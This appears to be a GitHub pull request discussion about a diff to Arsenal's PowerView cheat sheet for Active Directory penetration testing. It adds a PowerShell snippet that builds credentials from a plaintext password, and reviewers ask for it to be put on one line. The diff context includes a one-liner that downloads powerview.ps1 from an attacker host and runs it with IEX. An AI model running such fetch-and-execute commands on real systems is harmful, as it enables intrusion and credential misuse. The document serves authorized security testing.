arsenal/data/cheats/Active_directory/powerview.md

```diff
@@ -11,6 +11,16 @@ https://github.com/PowerShellMafia/PowerSploit/
 (new-object system.net.webclient).downloadstring('http://<lhost>/powerview.ps1') | IEX
 ```
 
+## Set alternative creds to use
+#plateform/windows #target/remote  #cat/RECON 
+Example : Use with commands as "-Credential $creds"
+
+```powershell
```

Comment:
Hey, thanks for this pr too ! Arsenal does not support multiline command so I added semi-colon to concatenate each.

```powershell
$passwd = ConvertTo-SecureString "<password>" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<user>", $passwd)
```
Can you replace the three lines by this one ? I also added double quotes for windows :D

Reply:
Hi @rumble773 ,

Sorry for the delay and thanks for your contribution !
Could you modify your PR with requested changes ?

Reply:
Hi there @v1k1ngfr,
and thanks @Guilhem7 On it.

Reply:
I made all the commits, not sure what to do now? should I make another pull request?